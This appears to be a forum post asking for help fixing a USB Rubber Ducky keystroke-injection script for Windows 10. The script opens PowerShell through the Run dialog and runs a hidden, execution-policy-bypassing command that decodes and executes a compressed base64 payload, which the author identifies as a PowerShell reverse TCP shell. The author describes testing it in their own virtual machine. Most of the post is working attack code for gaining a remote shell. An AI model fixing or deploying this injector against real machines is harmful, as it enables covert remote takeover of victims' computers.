base64 powershell windows 10


R03L

I got this working shell from text on a Windows 10 desktop,
and when I press ENTER it works perfectly,
but after inserting it in the ducky, so with the ducky code ENTER, it stays unclosed and the " are not in place.

Ducky beginner's mistakes, details; also MS is always busy imposing themselves with the slightest changes, which actually Linux has most minimal.
It's a nice tool though.
Playing around with these details, but for today I seem not to find this little detail.
Well, it's a 34-degree heatwave outside, so maybe anybody can help me with it.
 

DELAY 400
GUI r
DELAY 450
STRING powershell
ENTER
DELAY 400
STRING powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
ENTER
DELAY 1000
GUI r
DELAY 200
ESC
DELAY 100
ESC
DELAY 100
ESC

Oh yeah, this base64 is virtualnet, never mind that; the shell works.
payload(cmd/windows/powershell_reverse_tcp)
After copy and paste of it from inside the Windows VM guest, it just doesn't on the ducky.

The difference, theoretically,
is the virtual ducky code ENTER and the physical Enter.
